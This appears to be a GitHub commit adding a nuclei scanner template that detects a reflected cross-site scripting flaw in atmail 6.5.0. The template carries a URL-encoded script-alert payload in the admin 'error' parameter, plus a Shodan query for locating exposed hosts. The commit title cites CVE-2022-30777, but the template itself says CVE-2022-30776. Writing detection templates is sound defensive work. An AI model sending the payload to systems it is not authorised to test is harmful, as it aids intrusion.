Merge pull request #4421 from projectdiscovery/CVE-2022-30777-1

Create CVE-2022-30777.yaml
patch-1
Prince Chaddha 2022-05-24 13:48:48 +05:30 committed by GitHub
commit ebf4bca402
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2022-30776
info:
name: Atmail - Cross Site Scripting
author: 3th1c_yuk1
severity: medium
description: |
atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter.
reference:
- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
- https://www.atmail.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-30776
metadata:
verified: true
shodan-query: http.html:"atmail"
tags: cve,cve2022,atmail,xss
requests:
- method: GET
path:
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Error: 1<script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200